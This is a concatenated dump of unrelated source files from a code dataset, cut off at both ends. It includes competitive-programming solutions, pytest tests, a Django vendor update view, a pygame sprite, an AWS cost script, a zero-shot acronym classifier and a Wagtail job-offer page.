2019/you-can-go-your-own-way.py","file_name":"you-can-go-your-own-way.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"480465697","text":"import sys\nsys.setrecursionlimit(10**8)\ninput = sys.stdin.readline\n\ndef chk_count(n,r,c,count) :\n if (n == 0) :\n return count\n\n if (2**(n-1) <= r) :\n if (2**(n-1) <= c) : \n return chk_count(n-1,r-(2**(n-1)),c-(2**(n-1)),count+(2**((n-1)*2))*3)\n else :\n return chk_count(n-1,r-(2**(n-1)),c,count+(2**((n-1)*2))*2)\n else :\n if (2**(n-1) <= c) :\n return chk_count(n-1,r,c-(2**(n-1)),count+(2**((n-1)*2))*1)\n else :\n return chk_count(n-1,r,c,count)\n\nn,r,c = map(int, input().split())\nprint(chk_count(n,r,c,0))","sub_path":"장범규/[20.10.14]1074.py","file_name":"[20.10.14]1074.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"462351082","text":"import pytest\nimport numpy as np\nimport os\nimport pickle\nimport pandas as pd\nfrom functools import partial\n\nfrom pvoutput import mapscraper as ms\nfrom pvoutput.consts import MAP_URL\nfrom pvoutput.tests.test_utils import data_dir\nfrom pvoutput.tests.create_mapscraper_test_files import get_keys_for_dict\n\n\ndef get_cleaned_test_soup():\n test_soup_filepath = os.path.join(data_dir(), 'mapscraper_soup.pickle')\n with open(test_soup_filepath, 'rb') as f:\n test_soup = pickle.load(f)\n return ms.clean_soup(test_soup)\n\n\n@pytest.fixture(scope='module')\ndef get_test_dict_of_dfs():\n dict_filepath = os.path.join(data_dir(), 'mapscraper_dict_of_dfs.pickle')\n with open(dict_filepath, 'rb') as f:\n test_soup = pickle.load(f)\n return test_soup\n\n\n@pytest.fixture(scope='module')\ndef get_function_dict():\n #using partials so functions only get executed when needed\n soup = get_cleaned_test_soup()\n df = ms._process_system_size_col(soup)\n index = df.index\n keys = get_keys_for_dict()\n functions = (partial(ms._process_system_size_col, soup),\n partial(ms._process_output_col, soup, index),\n partial(ms._process_generation_and_average_cols, soup, index),\n partial(ms._process_efficiency_col, soup, index),\n partial(ms._process_metadata, soup))\n function_dict = dict(zip(keys, functions))\n return function_dict\n\n\ndef compare_function_output_to_pickle(key, function_dict, dict_of_dfs, series=False):\n df_from_func = function_dict[key]()\n test_df = dict_of_dfs[key]\n if series:\n return pd.testing.assert_series_equal(df_from_func, test_df)\n return pd.testing.assert_frame_equal(df_from_func, test_df, check_like=True)\n\n\ndef test_convert_to_country_code():\n assert ms._convert_to_country_code(1) == 1\n assert ms._convert_to_country_code('United Kingdom') == 243\n\n def _assert_raises(bad_countries, exception):\n for bad_country in bad_countries:\n with pytest.raises(exception):\n ms._convert_to_country_code(bad_country)\n pytest.fail('Failed to raise {} for country={}'\n .format(exception.__name__, bad_country))\n\n _assert_raises([-1, -100, 1000, 'blah'], ValueError)\n\n\ndef test_create_map_url():\n assert ms._create_map_url() == MAP_URL\n assert ms._create_map_url(country_code=1) == MAP_URL + '?country=1'\n assert ms._create_map_url(page_number=2) == MAP_URL + '?p=2'\n assert ms._create_map_url(ascending=True) == MAP_URL + '?d=asc'\n assert ms._create_map_url(ascending=False) == MAP_URL + '?d=desc'\n assert ms._create_map_url(sort_by='efficiency') == MAP_URL + '?o=gss'\n with pytest.raises(ValueError):\n ms._create_map_url(sort_by='blah')\n\n\ndef test_pv_system_size_metadata(get_function_dict, get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('pv_system_size_metadata', get_function_dict,\n get_test_dict_of_dfs) is None\n\n\ndef test_process_output_col(get_function_dict, get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('process_output_col',\n get_function_dict,\n get_test_dict_of_dfs, series=True) is None\n\n\ndef test_process_generation_and_average_cols(get_function_dict,\n get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('process_generation_and_average_cols',\n get_function_dict,\n get_test_dict_of_dfs) is None\n\n\ndef test_process_efficiency_col(get_function_dict, get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('process_efficiency_col',\n get_function_dict,\n get_test_dict_of_dfs,\n series=True) is None\n\n\ndef test_process_metadata(get_function_dict, get_test_dict_of_dfs):\n assert compare_function_output_to_pickle('process_metadata',\n get_function_dict,\n get_test_dict_of_dfs) is None","sub_path":"pvoutput/tests/mapscraper_test.py","file_name":"mapscraper_test.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552720381","text":"\n\"\"\"\nModule for constants in OpenNSA.\n\nOften the same constants are used in multiple modules where one does not want\ncross-imports, like protocols/nsi2 and topology. This module gives a place to\nkeep them all. While not being particularly elegant it does solve a real\nproblem.\n\nIt is recommend to import this module as 'cnt' to keep the prefix short, but\nalso the same in the code base.\n\n\"\"\"\n\n\nURN_OGF_PREFIX = 'urn:ogf:network:'\n\nCS2_SERVICE_TYPE = 'application/vnd.org.ogf.nsi.cs.v2+soap'\n\nBIDIRECTIONAL = 'Bidirectional'\n\nEVTS_AGOLE = 'http://services.ogf.org/nsi/2013/07/descriptions/EVTS.A-GOLE'\n\nETHERNET = 'http://schemas.ogf.org/nml/2012/10/ethernet'\nETHERNET_VLAN = '%s#vlan' % ETHERNET\n\nP2P_SERVICE = 'http://schemas.ogf.org/nsi/2013/12/services/point2point#p2ps'\n\n","sub_path":"opennsa/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"615629887","text":"# -*- coding: utf-8 -*-\r\nfrom backend.lib.Wrapper import wrapper\r\nfrom backend.models import Vendor\r\n\r\ndef index(request):\r\n fields = Vendor._meta.get_all_field_names()\r\n fields.remove('invoice')\r\n fields.remove('invoiceproduct')\r\n fields.remove('itemproduct')\r\n fields.remove('product')\r\n fields.remove('purchase')\r\n fields.remove('id')\r\n fields.append('vendor')\r\n return wrapper(request=request, req_params=fields, worker=worker, context='vendor')\r\n\r\ndef worker(req):\r\n vendor = req.params()['vendor']\r\n name = req.params()['name']\r\n address_1 = req.params()['address_1']\r\n address_2 = req.params()['address_2']\r\n address_3 = req.params()['address_3']\r\n address_4 = req.params()['address_4']\r\n address_5 = req.params()['address_5']\r\n phone_num_1 = req.params()['phone_num_1']\r\n phone_num_2 = req.params()['phone_num_2']\r\n cell_phone_num = req.params()['cell_phone_num']\r\n fax_num = req.params()['fax_num'] \r\n web = req.params()['web']\r\n category = req.params()['category']\r\n account_num = req.params()['account_num']\r\n contact = req.params()['contact']\r\n email = req.params()['email']\r\n payment_terms = req.params()['payment_terms']\r\n delivery_charge = req.params()['delivery_charge']\r\n delivery_minimum = req.params()['delivery_minimum']\r\n delivery_daysandtimes = req.params()['delivery_daysandtimes']\r\n notes = req.params()['notes']\r\n delivery_zip = req.params()['delivery_zip']\r\n purchase_order_email_1 = req.params()['purchase_order_email_1']\r\n purchase_order_email_2 = req.params()['purchase_order_email_2']\r\n purchase_order_email_3 = req.params()['purchase_order_email_3']\r\n purchase_order_email_4 = req.params()['purchase_order_email_4']\r\n description = req.params()['description']\r\n contact_phone_number1 = req.params()['contact_phone_number1']\r\n contact_phone_number2 = req.params()['contact_phone_number2']\r\n contact_email = req.params()['contact_email']\r\n company_name = req.params()['company_name']\r\n delivery_notes = req.params()['delivery_notes']\r\n\r\n #update vendor\r\n vendor.name = name\r\n vendor.description = description\r\n vendor.address_1 = address_1\r\n vendor.address_2 = address_2\r\n vendor.address_3 = address_3\r\n vendor.address_4 = address_4\r\n vendor.address_5 = address_5\r\n vendor.phone_num_1 = phone_num_1\r\n vendor.phone_num_2 = phone_num_2\r\n vendor.cell_phone_num = cell_phone_num\r\n vendor.fax_num = fax_num\r\n vendor.web = web\r\n vendor.category = category\r\n vendor.account_num = account_num\r\n vendor.contact = contact\r\n vendor.email = email\r\n vendor.payment_terms = payment_terms\r\n vendor.delivery_charge = delivery_charge\r\n vendor.delivery_minimum = delivery_minimum\r\n vendor.delivery_daysandtimes = delivery_daysandtimes\r\n vendor.notes = notes\r\n vendor.delivery_zip = delivery_zip\r\n vendor.purchase_order_email_1 = purchase_order_email_1\r\n vendor.purchase_order_email_2 = purchase_order_email_2\r\n vendor.purchase_order_email_3 = purchase_order_email_3\r\n vendor.purchase_order_email_4 = purchase_order_email_4\r\n vendor.contact_phone_number1 = contact_phone_number1\r\n vendor.contact_phone_number2 = contact_phone_number2\r\n vendor.contact_email = contact_email\r\n vendor.company_name = company_name\r\n vendor.delivery_notes = delivery_notes\r\n\r\n #save vendor\r\n vendor.save()\r\n\r\n return { \"success\": True, \"message\": \"vendor %s successfully changed\" % str(vendor.id) }\r\n","sub_path":"backend/vendor/update/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"14251431","text":"# This problem was asked by Facebook.\n\n# Given a function f, and N return a debounced f of N milliseconds.\n\n# That is, as long as the debounced f continues to be invoked, f itself will not be called for N milliseconds.\n\nimport signal\nimport time\n\ndef f():\n\tprint(\"calling f\")\n\n\ndef handler(*args):\n\tprint(\"this is the handler\")\n\tf()\n\n\ndef debounced_f(f, N):\n\tprint(\"debouced_f\")\n\tsignal.signal(signal.SIGALRM, handler)\n\tsignal.alarm(N)\n\tprint(\"alarm set\")\n\nif __name__ == '__main__':\n\tdebounced_f(f, 5)\n\tfor i in range(100):\n\t\tprint(i)\n\t\ttime.sleep(1)\n\t\tif i == 2:\n\t\t\tdebounced_f(f, 5)","sub_path":"andylou2/10_19_2018.py","file_name":"10_19_2018.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"250002077","text":"#导入模块\r\nimport pygame\r\n#导入精灵类\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Bullet(Sprite):\r\n \"\"\"飞船发射的子弹类\"\"\"\r\n def __init__(self, sb_settings, screen, airship):\r\n \"\"\"在飞船所在位置创建子弹对象\"\"\"\r\n #继承 Sprite 精灵类\r\n super().__init__()\r\n self.screen = screen\r\n\r\n #先在(0,0)处创建子弹矩形,再设置其正确位置\r\n self.rect = pygame.Rect(0, 0, sb_settings.bullet_width,\r\n sb_settings.bullet_height)\r\n self.rect.centerx = airship.rect.centerx\r\n self.rect.top = airship.rect.top\r\n\r\n #子弹位置用 y 坐标表示,强制为浮点数类型\r\n self.y = float(self.rect.y)\r\n\r\n #获取参数设置里的颜色及速度设置值\r\n self.color = sb_settings.bullet_color\r\n self.speed = sb_settings.bullet_speed\r\n\r\n def update(self):\r\n \"\"\"向上移动子弹\"\"\"\r\n #更新子弹位置值\r\n self.y -= self.speed\r\n \r\n #更新子弹rect的位置\r\n self.rect.y = self.y\r\n \r\n def draw_bullet(self):\r\n \"\"\"在屏幕上绘制子弹\"\"\"\r\n pygame.draw.rect(self.screen, self.color, self.rect)\r\n ","sub_path":"MyProjects/Python/Shoot_Bees/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156752762","text":"from datetime import datetime\n\n\ndef date_time(time: str) -> str:\n time = datetime.strptime(time, '%d.%m.%Y %H:%M')\n plural_time = ('s' if i != 1 else '' for i in (time.hour, time.minute))\n return time.strftime('%-d %B %Y year %-H hour{} %-M minute{}').format(*plural_time)\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(date_time('01.01.2000 00:00'))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert date_time(\"01.01.2000 00:00\") == \"1 January 2000 year 0 hours 0 minutes\", \"Millenium\"\n assert date_time(\"09.05.1945 06:30\") == \"9 May 1945 year 6 hours 30 minutes\", \"Victory\"\n assert date_time(\"20.11.1990 03:55\") == \"20 November 1990 year 3 hours 55 minutes\", \"Somebody was born\"\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")","sub_path":"electronic_station/date_and_time_converter.py","file_name":"date_and_time_converter.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"214223882","text":"'''\r\nCreated on May 26, 2010\r\n\r\n@author: Dr. Rainer Hessmer\r\n'''\r\nimport wx\r\nimport wx.lib.sized_controls as sc\r\n\r\nclass SpeedControllerSettingsDialog(sc.SizedDialog):\r\n def __init__(self, parent, mainModel):\r\n sc.SizedDialog.__init__(self, parent, -1, \"Speed Controller\", style=wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)\r\n \r\n self._MainModel = mainModel\r\n speedControlParams = mainModel.SpeedControlParams\r\n \r\n _Pane = self.GetContentsPane()\r\n _Pane.SetSizerType(\"form\")\r\n \r\n # row 1\r\n wx.StaticText(_Pane, -1, 'P:')\r\n self._PTextControl = wx.TextCtrl(_Pane, -1, str(speedControlParams['P']))\r\n self._PTextControl.SetSizerProps(expand=True)\r\n \r\n # row 2\r\n wx.StaticText(_Pane, -1, 'I:')\r\n self._ITextControl = wx.TextCtrl(_Pane, -1, str(speedControlParams['I']))\r\n self._ITextControl.SetSizerProps(expand=True)\r\n \r\n # row 3\r\n wx.StaticText(_Pane, -1, 'D:')\r\n self._DTextControl = wx.TextCtrl(_Pane, -1, str(speedControlParams['D']))\r\n self._DTextControl.SetSizerProps(expand=True)\r\n\r\n wx.StaticText(_Pane, -1, '')\r\n\r\n self._ApplyPIDButton = wx.Button(_Pane, -1, 'Set PID')\r\n self._ApplyPIDButton.Bind(wx.EVT_BUTTON, self._OnApplyPID)\r\n\r\n self._SpeedTextControl = wx.TextCtrl(_Pane, -1, '0.0')\r\n self._SpeedTextControl.SetSizerProps(expand=True)\r\n\r\n self._ApplySpeedButton = wx.Button(_Pane, -1, 'Set Speed')\r\n self._ApplySpeedButton.Bind(wx.EVT_BUTTON, self._OnApplySpeed)\r\n \r\n # add dialog buttons\r\n #self.SetButtonSizer(self.CreateStdDialogButtonSizer(wx.OK | wx.CANCEL))\r\n \r\n # final row\r\n # since we want to use a custom button layout, we won't use the \r\n # CreateStdDialogBtnSizer here, we'll just create our own panel with\r\n # a horizontal layout and add the buttons to that.\r\n #buttonPanel = sc.SizedPanel(_Pane, -1)\r\n #buttonPanel.SetSizerType(\"horizontal\")\r\n #buttonPanel.SetSizerProps(expand=True)\r\n #self._CancelButton.Bind(wx.EVT_BUTTON, self._OnCancel)\r\n \r\n \r\n # a little trick to make sure that you can't resize the dialog to\r\n # less screen space than the controls need\r\n self.Fit()\r\n self.SetMinSize(self.GetSize())\r\n\r\n def _OnCancel(self, e):\r\n self.Close(True) # Close the frame.\r\n\r\n def _OnApplyPID(self, e):\r\n pidParams = (self._PTextControl.Value, self._ITextControl.Value, self._DTextControl.Value)\r\n self._MainModel.SetSpeedControlParams(pidParams)\r\n\r\n def _OnApplySpeed(self, e):\r\n self._MainModel.SetSpeed(self._SpeedTextControl.Value)\r\n","sub_path":"PythonClient/RobotController/src/UI/SpeedControllerSettingsDialog.py","file_name":"SpeedControllerSettingsDialog.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"249252978","text":"'''\nUna EPS desea conocer el numero personas atendidas en su programa de \nvacunación contra el COVID 19, la información debe ir discriminada \nde la siguiente manera: Número total de personas atendidas, número total \nde mujeres atendidas, número total de hombres atendidos, personas atendidas \nentre los rangos de edades de 40 a 49, 50 a 59, 60 a 69, 70 a 79 y mayores de 80.\n\nLa ciudad cuenta con 8 comunas, se desea conocer también el número de personas \natendidas por comuna y las personas que en los últimos 3 meses tuvieron COVID 19.\n\nSe debe procesar n cantidad de datos de personas con la siguiente información:\n1. Edad\n2. Sexo\n3. Comuna\n4. Covid_antes_SN\n\nEscriba una función que reciba como parámetros una lista de diccionarios \nque contengan la siguiente información:\n1. Edad: int\n2. Sexo: f/m\n3. Comuna: Puede ser de la 01 a la 08\n4. Covid_antes: puede ser afirmativo o negativo (s/n)\n\nEjemplo Datos\ndatos: list = [\n {\n \"edad\": 40\n \"sexo\": f\n \"comuna\": 04\n \"covid_antes\": n\n },\n]\nLa respuesta debe retornar un diccionario con la siguiente información:\n# total de personas atendidas\n# total de mujeres atendidas\n# total de hombres atendidos\n# total de personas atendidas con edades entre los 40 y 49 años.\n# total de personas atendidas con edades entre los 50 y 59 años.\n# total de personas atendidas con edades entre los 60 y 69 años.\n# total de personas atendidas con edades entre los 70 y 79 años.\n# total de personas atendidas mayores de 80 años.\n'''\ndef EPS_COVID(datos: list) -> dict:\n Total_atendidos = 0\n Mujeres : str = \"f\"\n Hombres : str = \"m\"\n Total_mujeres = 0\n Total_hombres = 0\n Total_cuarenta_cuarentaynueve = 0\n Total_cincuenta_cincuentaynueve = 0\n Total_sesenta_sesentaynueve = 0\n Total_sententa_setentaynueve = 0\n Total_mayores_ochenta = 0\n for item in datos:\n Total_atendidos += 1\n if item['sexo'] == Mujeres:\n Total_mujeres += 1\n elif item['sexo'] == Hombres:\n Total_hombres += 1\n if item['edad'] >= 40 and item['edad'] < 50:\n Total_cuarenta_cuarentaynueve += 1\n elif item['edad'] >= 50 and item['edad'] < 60:\n Total_cincuenta_cincuentaynueve +=1\n elif item['edad'] >= 60 and item['edad'] < 70:\n Total_sesenta_sesentaynueve += 1\n elif item['edad'] >= 70 and item['edad'] < 80:\n Total_sententa_setentaynueve += 1\n elif item['edad'] >= 80:\n Total_mayores_ochenta += 1\n resultado: dict = {\n \"Total_personas_atendidas\" : Total_atendidos,\n \"Total_mujeres_atendidas\" : Total_mujeres,\n \"Total_hombres_atendidos\" : Total_hombres,\n \"Total-de_personas_atendidas_con_edades_entre_los_40_y_49_años\": Total_cuarenta_cuarentaynueve,\n \"Total-de_personas_atendidas_con_edades_entre_los_50_y_59_años\": Total_cincuenta_cincuentaynueve,\n \"Total-de_personas_atendidas_con_edades_entre_los_60_y_69_años\": Total_sententa_setentaynueve,\n \"Total-de_personas_atendidas_con_edades_entre_los_70_y_79_años\": Total_sesenta_sesentaynueve,\n \"Total-de_personas_atendidas_mayores_80\": Total_mayores_ochenta\n }\n return resultado\nimport pprint\ndatos: list = [\n {\n \"sexo\" : \"f\",\n \"edad\" : 40,\n \"comuna\" : \"04\",\n \"covid_antes\" : \"n\"\n },\n {\n \"sexo\" : \"f\",\n \"edad\" : 49,\n \"comuna\" : \"05\",\n \"covid_antes\" : \"n\"\n },\n {\n \"sexo\" : \"m\",\n \"edad\" : 51,\n \"comuna\" : \"06\",\n \"covid_antes\" : \"s\"\n },\n {\n \"sexo\" : \"f\",\n \"edad\" : 62,\n \"comuna\" : \"07\",\n \"covid_antes\" : \"s\"\n },\n {\n \"sexo\" : \"m\",\n \"edad\" : 80,\n \"comuna\" : \"04\",\n \"covid_antes\" : \"n\"\n },\n {\n \"sexo\" : \"m\",\n \"edad\" : 62,\n \"comuna\" : \"05\",\n \"covid_antes\" : \"s\"\n },\n {\n \"sexo\" : \"m\",\n \"edad\" : 72,\n \"comuna\" : \"06\",\n \"covid_antes\" : \"n\"\n }\n]\npprint.pprint(EPS_COVID(datos))","sub_path":"EPS.py","file_name":"EPS.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569778402","text":"import datetime\n#from d3 import find_cost\nfrom datetime import date, timedelta\n\n\ndef find_cost1(desc,stdt,endt):\n import boto3\n client = boto3.client('ce')\n stdt = str(stdt)\n endt = str(endt)\n\n response = client.get_cost_and_usage(\n TimePeriod={\n 'Start': stdt,\n 'End': endt\n },\n Granularity='DAILY',\n Metrics=[\n 'BlendedCost',\n ],\n )\n bill = 0\n for nik in response['ResultsByTime']:\n amt = float(nik['Total']['BlendedCost']['Amount'])\n bill = bill + amt\n ##print(desc)\n print(bill)\n\n\nlast_days = 6\ndesc1 = \"BILL INSCREASE IN LAST 5 DAYS \"+ \"\\n\"\nfor i in range(1,last_days):\n stdt = date.today() - timedelta(i)\n endt = date.today() - timedelta(i-1)\n #print(str(stdt) +\" \"+ str(endt))\n desc1=\"\"\n desc1= str(stdt) + \":\"\n find_cost1(desc1,stdt,endt)\n\n\n\n# if (todayDate - todayDate.replace(day=1)).days > 25:\n# stmonth= todayDate + datetime.timedelta(30)\n# stmonth.replace(day=1)\n# print(stmonth)\n# else:\n# stmonth = (todayDate.replace(day=1))","sub_path":"NIK2.py","file_name":"NIK2.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649809513","text":"#perintah untuk menginput nilai\nnum = eval(input('Please enter an integer in the range 0...9999: '))\n\nif num < 0 : #jika nilai yang diinput kurang dari nol, maka\n num = 0 #maka akan di anggap nol\nif num > 9999: #jika nilai yang diinput lebih besar dari 9999, maka\n num = 9999 #akan dianggap 9999\n\nprint(\"[\", end=\"\") #perintah untuk mencetak kurung siku, keyword argumen\n # end=\"\" menjadikan bahwa cetakan ini akan berlanjut\n # dengan perintah-perintah 'print' yang lain\n\n\ndigit = num//1000 #menentukan digit ribuan\nprint(digit, end=\"\") #mencetak hasil digit tersebut dan meletakkannya setelah\n #tanda kurung siku di perintah sebelumnya, perintah cetak\n #akan dilanjutkan oleh perintah 'print' berikutnya.\nnum %= 1000 #menghitung nilai sisa pembagian num dengan 1000\n\n\ndigit = num//1000 #menentukan digit ratusan\nprint(digit, end=\"\") #mencetak hasil digit tersebut dan meletakkannya setelah\n #digit ribuan di perintah sebelumnya, perintah cetak\n #akan dilanjutkan oleh perintah 'print' berikutnya.\nnum %= 1000 #menghitung nilai sisa pembagian num dengan 100\n\n\ndigit = num//1000 #menentukan digit puluhan\nprint(digit, end=\"\") #mencetak hasil digit tersebut dan meletakkannya setelah\n #digit ratusan di perintah sebelumnya, perintah cetak\n #akan dilanjutkan oleh perintah 'print' berikutnya.\nnum %= 1000 #menghitung nilai sisa pembagian num dengan 10\n\nprint(num, end=\"\") #mencetak hasil sisa pembagian num dengan 10 dan\n #menempatkannya pada digit satuan, perintah print berlanjut\n\nprint(\"]\") #mencetak kurung siku, sehingga secara keseluruhan perintah\n #print akan mencetak 6 karakter: [****], dimana **** ini adalah\n #digit ribuan, ratusan, puluhan, dan satuan, berturut-turut.","sub_path":"chapter4_conditional-execution/leadingzeroes.py","file_name":"leadingzeroes.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239487126","text":"#!/usr/bin/env python3\nimport heapq\n\ndef main():\n def dijkstra(i):\n # print('-'*100)\n hq = [(i, 0)]\n\n time_list = [float('inf')] * N\n # 引っ越し候補地のバス停のコストは0\n time_list[i] = 0\n\n heapq.heapify(hq)\n # print(f'time_list: {time_list}')\n while hq:\n bus_stop, total_time = heapq.heappop(hq)\n\n # print(f'bus_stop, total_time: {bus_stop}, {total_time}')\n\n for a2b, a2b_time in rosen[bus_stop]:\n # print(f'a2b, a2b_time: {a2b}, {a2b_time}')\n\n if total_time + a2b_time < time_list[a2b]:\n time_list[a2b] = total_time + a2b_time\n heapq.heappush(hq, (a2b, time_list[a2b]))\n # print(f'time_list: {time_list}')\n\n return time_list\n\n N, M = map(int, input().split())\n rosen = [[] for _ in range(N)]\n\n for _ in range(M):\n a, b, t = map(int, input().split())\n a -= 1\n b -= 1\n rosen[a].append((b, t))\n rosen[b].append((a, t))\n # print(rosen)\n\n ans = float('inf')\n for i in range(N):\n d = dijkstra(i)\n ans = min(ans, max(d))\n print(ans)\n\nif __name__ == '__main__':\n main()\n","sub_path":"atcoder/python/beginner/abc012/D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305622843","text":"\"\"\"\n# -*- coding: UTF-8 -*-\n# **********************************************************************************#\n# File: Exceptions utils file.\n# Author: Myron\n# **********************************************************************************#\n\"\"\"\nerror_wrapper = (lambda code, message: {'code': code, 'data': message, 'msg': message})\n\n\ndef deal_with_exception(func):\n \"\"\"\n Deal with exception.\n \"\"\"\n def _decorator(obj, *args, **kwargs):\n try:\n response = func(obj, *args, **kwargs)\n except tuple(Exceptions.error_types()) as error_code:\n response = error_code.args[0]\n except:\n response = error_wrapper(500, 'Exception unknown.'.format(func.func_name))\n return response\n return _decorator\n\n\nclass DataException(Exception):\n \"\"\"\n Exception in module data.\n \"\"\"\n pass\n\n\nclass BaseExceptions(object):\n \"\"\"\n Base exception enumerate.\n \"\"\"\n @classmethod\n def enumerates(cls):\n \"\"\"\n all exceptions enumerate.\n \"\"\"\n return [value for attr, value in cls.__dict__.items()]\n\n @classmethod\n def error_types(cls):\n \"\"\"\n all error types enumerate.\n \"\"\"\n return tuple([\n DataException\n ])\n\n\nclass Exceptions(BaseExceptions):\n \"\"\"\n Enumerate exceptions.\n \"\"\"\n INVALID_FIELDS = DataException(error_wrapper(500, 'There exits invalid fields.'))\n\n\n__all__ = [\n 'Exceptions',\n]\n","sub_path":"g_air/utils/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616551699","text":"import os\nimport json\nimport argparse\nfrom tqdm import tqdm\nfrom transformers import pipeline, AutoModel, AutoTokenizer\n\nmodel_name = 'facebook/bart-large-mnli'\nMODEL_DIR = 'embeddings'\nMAX_LENGTH = 512\nDEVICE = -1 # CPU\n\ndef process_entry(entry, dictionary):\n tokens = entry['tokens']\n acronym = tokens[entry['acronym']]\n expansions = dictionary.get(acronym)\n if expansions is None or len(expansions) == 0:\n return None, None\n tokens = ' '.join(map(lambda _: _.lower(), tokens))\n return tokens, expansions\n\ndef check_prediction(classifier, entry, dictionary):\n tokens, expansions = process_entry(entry, dictionary)\n actual = entry.get('expansion')\n pred = classifier(tokens, expansions)\n predicted = pred.get('labels')\n if not predicted or not isinstance(predicted, list):\n return False\n return actual == predicted[0]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input-file\", help=\"JSON input file\")\n parser.add_argument(\"--dictionary-file\", help=\"JSON dictionary file with acronyms and expansions\",\n default=os.path.join('data', 'diction.json'))\n parser.add_argument(\"--model-name\", help=\"Model name\", default=model_name)\n args = parser.parse_args()\n\n with open(args.input_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n data = data[:1000]\n with open(args.dictionary_file, 'r', encoding='utf-8') as f:\n dictionary = json.load(f)\n model_name = args.model_name\n model = AutoModel.from_pretrained(model_name, cache_dir=MODEL_DIR)\n tokenizer = AutoTokenizer.from_pretrained(model_name, cache_dir=MODEL_DIR)\n classifier = pipeline('zero-shot-classification', model=model, tokenizer=tokenizer, device=DEVICE)\n results = list(map(lambda x: check_prediction(classifier, x, dictionary), tqdm(data)))\n print('Accuracy:', sum(results)/len(results))\n","sub_path":"models/zeroshot.py","file_name":"zeroshot.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191591836","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.core.validators import MinValueValidator\nfrom django import forms\n\nfrom wagtail.admin.edit_handlers import (\n FieldPanel,\n StreamFieldPanel,\n MultiFieldPanel,\n HelpPanel,\n)\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.core.fields import StreamField\nfrom wagtail.search import index\n\nfrom core.blocks import StandardStreamBlock\nfrom core.models import BasePage, StandardPage\n\nfrom .fields import ChoiceArrayField\n\n\nclass JobOfferIndexPage(BasePage):\n subpage_types = [\"JobOfferPage\"]\n max_count_per_parent = 1\n\n heading = models.CharField(\"Überschrift\", max_length=255, blank=True)\n highlight_in_heading = models.CharField(\n \"Hervorhebungen in der Überschrift\",\n help_text=\"Wiederhole Text aus der Überschrift der farblich hervorgehoben werden soll\",\n blank=True,\n max_length=255,\n )\n subtitle = models.CharField(\"Untertitel\", max_length=255, blank=True)\n\n before_jobs = StreamField(\n StandardStreamBlock,\n blank=True,\n verbose_name=\"Intro-Text (wenn Jobs vorhanden)\",\n help_text=\"Wird als Text vor der Liste der Stellenanzeigen angezeigt. Aber nur wenn es auch Stellenanzeigen gibt.\",\n )\n\n after_jobs = StreamField(\n StandardStreamBlock,\n blank=True,\n verbose_name=\"Outro-Text (wenn Jobs vorhanden)\",\n help_text=\"Wird als Text nach der Liste der Stellenanzeigen angezeigt. Aber nur wenn es auch Stellenanzeigen gibt.\",\n )\n\n empty = StreamField(\n StandardStreamBlock(),\n blank=True,\n null=True,\n verbose_name=\"Wenn keine Jobs\",\n help_text=\"Wird angezeigt, wenn es keine Stellenanzeigen gibt.\",\n )\n\n def get_context(self, request):\n context = super().get_context(request)\n context[\"jobs\"] = JobOfferPage.objects.all().live()\n return context\n\n search_fields = BasePage.search_fields + [\n index.SearchField(\"heading\"),\n index.SearchField(\"subtitle\"),\n index.SearchField(\"before_jobs\"),\n index.SearchField(\"after_jobs\"),\n ]\n\n content_panels = [\n MultiFieldPanel(\n [\n FieldPanel(\"title\"),\n FieldPanel(\"heading\"),\n FieldPanel(\"highlight_in_heading\"),\n FieldPanel(\"subtitle\"),\n ],\n \"Kopf\",\n ),\n StreamFieldPanel(\"before_jobs\"),\n HelpPanel(\n template=\"jobs/admin_add_job_button.html\",\n heading=\"Stellenauschreibung 